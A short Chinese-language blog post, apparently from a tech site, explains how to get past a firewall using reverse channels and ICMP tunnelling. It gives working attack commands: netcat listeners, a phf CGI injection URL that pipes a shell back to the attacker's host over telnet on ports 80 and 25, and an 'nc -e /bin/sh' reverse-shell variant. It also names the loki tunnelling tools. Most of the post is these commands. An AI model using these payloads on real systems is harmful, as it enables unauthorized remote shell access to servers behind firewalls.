利用反向通道与隧道技术透过firewall

1:反向通道技术
比如说一台为于firewall之后的服务器A(ip:ipA),我的机子为B(ip:ipB)。
firewall只允许到来的数据包到达A的80和25端口,其他
一切拒绝。
现在先在自己的机子上执行
[sztcww@haha sztcww]# nc -l -n -v -p 80
[sztcww@haha sztcww]# nc -l -n -v -p 25
假如在A的机子上找到这个phf漏洞(不过现在还能找到吗,呵呵,
所以只做参考用)。现在可以利用以下几个命令来得到一个真正的
SHELL(说它是真正的是因为phf的漏洞利用也可以称为一个SHELL了)。
/cgi-bin/phf?Qalias=x%0a/bin/telnet%20ipB%2080%20|%20/bin/sh%20|
                     %20/bin/telnet%20ipB%2025
相当于在A的机子上执行了
telnet ipB 80|sh|telnet ipB 25
这样就利用反向tlenet铲回一个shell.
为什么可以在B的机子上得到一个A的SHELL,如果不知道,请翻看一下
管道的作用。
如果在A的机子上可以找到nc的话,也可以这样。
在我B机子上:
[sztcww@haha sztcww]# nc -l -n -v -p 80
A上:
/cgi-bin/phf?Qalias=x%0a/bin/nc%20-e%20/bin/sh%20ipB%2080

因为连接是从firewall之后的A服务器发起的,所以一般是能够通信的。

2:隧道技术
一般是利用ICMP封装真正的数据,也有UDP等其他的协议可以利用。
一般如果firewall不block icmp的话,就可以利用icmp隧道技术
与一台firewall之后的受害机子通信,也就是说可以得到
firewall之后的受害机子的一个SHELL。
关于这个更详细的讨论请参考Phrack的p49-6
可利用的工具有loki和lokid

防火墙(firewall)没有真正的接触过,这些都是书上看来的,不要告我抄袭就好哈,呵 
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值